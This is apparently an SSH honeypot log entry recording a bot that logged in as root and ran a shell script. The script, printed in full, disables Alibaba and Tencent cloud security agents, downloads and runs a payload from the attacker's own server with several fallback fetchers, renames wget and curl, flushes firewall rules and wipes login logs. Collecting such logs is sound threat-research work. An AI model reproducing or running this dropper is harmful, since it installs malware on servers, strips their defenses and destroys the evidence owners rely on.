[
 {
  "id": "55002306-5e2a-40a9-8158-7871f285a5dc",
  "name": "misty-noble-walrus",
  "protocol": "ssh",
  "channel_kind": "exec",
  "src_ip": "172.82.91.35",
  "src_port": 48980,
  "username": "root",
  "client_version": "SSH-2.0-PUTTY",
  "auth_attempts": 1,
  "automation": "bot",
  "think_ms": null,
  "probe_flagged": 0,
  "exec_command": "#!/bin/sh\n\n\nwdir=\"/tmp\"\nfor i in \"/dev/shm\" \"/tmp\" \"/var/tmp\" \"/home\" \"/root\"; do\n    touch \"$i/test_exec\" >/dev/null 2>&1\n    chmod +x \"$i/test_exec\" >/dev/null 2>&1\n    if [ -w \"$i\" ] && [ -x \"$i/test_exec\" ]; then\n        wdir=\"$i\"\n        rm -f \"$i/test_exec\"\n        break\n    fi\n    rm -f \"$i/test_exec\" >/dev/null 2>&1\ndone\ncd \"$wdir\" || exit 1\n\n\nfor svc in aegis aliyun YDService tat_agent; do\n    systemctl stop $svc >/dev/null 2>&1\n    systemctl disable $svc >/dev/null 2>&1\n    systemctl mask $svc >/dev/null 2>&1\ndone\nsystemctl daemon-reload >/dev/null 2>&1\n\nif command -v chattr >/dev/null 2>&1; then\n    chattr -R -i -a /usr/local/aegis/ >/dev/null 2>&1\n    chattr -R -i -a /usr/local/qcloud/ >/dev/null 2>&1\nfi\npkill -9 AliYunDun >/dev/null 2>&1\npkill -9 YDService >/dev/null 2>&1\nrm -rf /usr/local/aegis /usr/local/qcloud >/dev/null 2>&1\n\n\ndownload_vos() {\n    local_arch=$(uname -m)\n    SERVER_IP=\"172.82.91.35\" \n    SERVER_URL=\"http://${SERVER_IP}/new.php?type=${local_arch}\"\n    target=\"new.txt\"\n    T_LIMIT=30\n\n    rm -f \"$target\" >/dev/null 2>&1\n\n\n    do_dl() {\n        # 1. wget\n        if command -v wget >/dev/null 2>&1; then\n            wget --no-check-certificate -q -T $T_LIMIT \"$SERVER_URL\" -O \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        # 2. curl\n        if command -v curl >/dev/null 2>&1; then\n            curl -skL -m $T_LIMIT \"$SERVER_URL\" -o \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n\n        if command -v good >/dev/null 2>&1; then\n            good --no-check-certificate -q -T $T_LIMIT \"$SERVER_URL\" -O \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n\n        if command -v cool >/dev/null 2>&1; then\n            cool -skL -m $T_LIMIT \"$SERVER_URL\" -o \"$target\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        # 5. python3\n        if command -v python3 >/dev/null 2>&1; then\n            python3 -c \"import urllib.request; urllib.request.urlretrieve('$SERVER_URL', '$target')\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        # 6. python\n        if command -v python >/dev/null 2>&1; then\n            python -c \"import urllib; urllib.urlretrieve('$SERVER_URL', '$target')\" >/dev/null 2>&1\n            [ -s \"$target\" ] && return 0\n        fi\n        return 1\n    }\n\n\n    do_dl &\n    dl_pid=$!\n    sec=0\n    while [ $sec -lt $T_LIMIT ]; do\n        if ! kill -0 $dl_pid 2>/dev/null; then\n            wait $dl_pid\n            break\n        fi\n        sleep 1\n        sec=$((sec + 1))\n    done\n    kill -9 $dl_pid >/dev/null 2>&1\n\n\n    if [ -s \"$target\" ]; then\n        chmod +x \"$target\"\n        setsid \"./$target\" >/dev/null 2>&1 &\n        sleep 1\n        if ! pgrep -f \"$target\" >/dev/null; then\n            setsid sh \"./$target\" >/dev/null 2>&1 &\n        fi\n        return 0\n    fi\n    return 1\n}\n\ndownload_vos\n\n\nlock_tools() {\n    if command -v chattr >/dev/null 2>&1; then\n        chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1\n    fi\n    w_path=$(which wget 2>/dev/null)\n    [ -n \"$w_path\" ] && [ \"$(basename \"$w_path\")\" != \"good\" ] && mv \"$w_path\" \"$(dirname \"$w_path\")/good\" >/dev/null 2>&1\n    c_path=$(which curl 2>/dev/null)\n    [ -n \"$c_path\" ] && [ \"$(basename \"$c_path\")\" != \"cool\" ] && mv \"$c_path\" \"$(dirname \"$c_path\")/cool\" >/dev/null 2>&1\n}\nlock_tools\n\n\nsystemctl stop firewalld ufw >/dev/null 2>&1\niptables -F >/dev/null 2>&1\nfor log in /var/log/wtmp /var/log/btmp /var/log/lastlog; do [ -f \"$log\" ] && echo > \"$log\"; done\n\nsleep 2\nls -la /var/run/gcc.pid\n\n\n",
  "started_at": "2026-08-20T07:06:45.355737+00:00",
  "ended_at": "2026-08-20T07:06:47.226527+00:00",
  "ended_reason": "exec complete",
  "commands": 2,
  "transcript_bytes": 3666
 }
]